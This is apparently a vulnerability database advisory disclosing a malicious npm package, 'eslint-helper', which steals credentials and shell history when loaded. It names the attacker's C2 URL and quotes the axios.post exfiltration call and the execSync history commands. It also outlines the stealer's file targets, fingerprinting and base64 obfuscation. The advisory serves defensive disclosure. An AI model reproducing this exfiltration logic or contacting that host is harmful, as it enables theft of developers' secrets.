VDB
GCVE-110-OSM-2026-6310
GCVE-110-OSM-2026-6310
Advisory PublishedCVSS 8.8/10
Steals credentials and shell history at require-time by recursively scanning process.cwd() for config files and secrets then collecting bash/zsh/fish/PowerShell history and POSTing each file prefixed with a victim fingerprint to the Vercel-hosted C2 at https://vercel-backend-five-vert.vercel.app/api/v1 with the C2 URL and all file target patterns concealed via base64 encoding.
**Trigger**: require-time — index.js `from_str()` entry point fires on module load with no install hook.
**Filesystem scan**: `_k9b2x()` recursively traverses `process.cwd()` collecting files matching: `id.json`, `config.toml`, `Config.toml`, `config.json`, `env`, `.env`.
**Shell history**: `_gsh()` reads `~/.bash_history`, `~/.zsh_history`, fish history, and PowerShell PSReadLine; also runs `execSync('bash -c history')` and `execSync("zsh -c 'fc -l -1000'")`.
**Fingerprinting**: `_q8w3rData()` obtains local IP via UDP socket connect to 8.8.8.8:80 (no data sent); prepends `$USER@$LOCAL_IP\n` to each file before upload.
**Exfiltration**: `axios.post(API_URL, payload, { 'Content-Type': 'application/octet-stream', 'Content-Disposition': 'attachment; filename="{basename}"' })` uploads to https://vercel-backend-five-vert.vercel.app/api/v1
**Obfuscation**: C2 URL and file target patterns stored as base64-encoded string constants decoded at runtime via `decodeStr()`.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | eslint-helper | all (affected), 4.0.2 (affected) | — |
Aliases
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.